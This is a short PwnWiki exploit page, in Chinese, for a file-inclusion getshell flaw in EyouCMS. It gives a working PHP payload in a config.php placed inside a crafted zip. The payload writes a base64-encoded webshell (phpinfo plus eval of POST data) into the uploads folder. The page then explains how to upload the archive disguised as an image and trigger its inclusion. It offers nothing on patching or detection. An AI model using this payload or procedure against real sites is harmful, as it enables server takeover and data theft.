EyouCMS 文件包含Getshell漏洞

From PwnWiki
Revision as of 19:58, 25 June 2021 by Pwnwiki (talk | contribs) (Marked this version for translation)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese

漏洞影響

EyouCMS

漏洞利用

製作如下結構的壓縮文件: 

-weapp
--test
---config.php

config.php: 

<?php
file_put_contents("./uploads/allimg/0427bd01edea972d400a106514ab7f68.php",base64_decode("PD9waHAgcGhwaW5mbygp00BldmFsKCRfUE9TVFsyMzNdKTs/Pg=="));
?>

在提問功能處可以上傳圖片,把惡意壓縮包改成圖片後綴傳上去,得到一個上傳後的圖片路徑,在構造報文觸發文件包含。

phpinfo已經成功執行。

Retrieved from "https://pwnwiki.com/index.php?title=EyouCMS_文件包含Getshell漏洞&oldid=5951"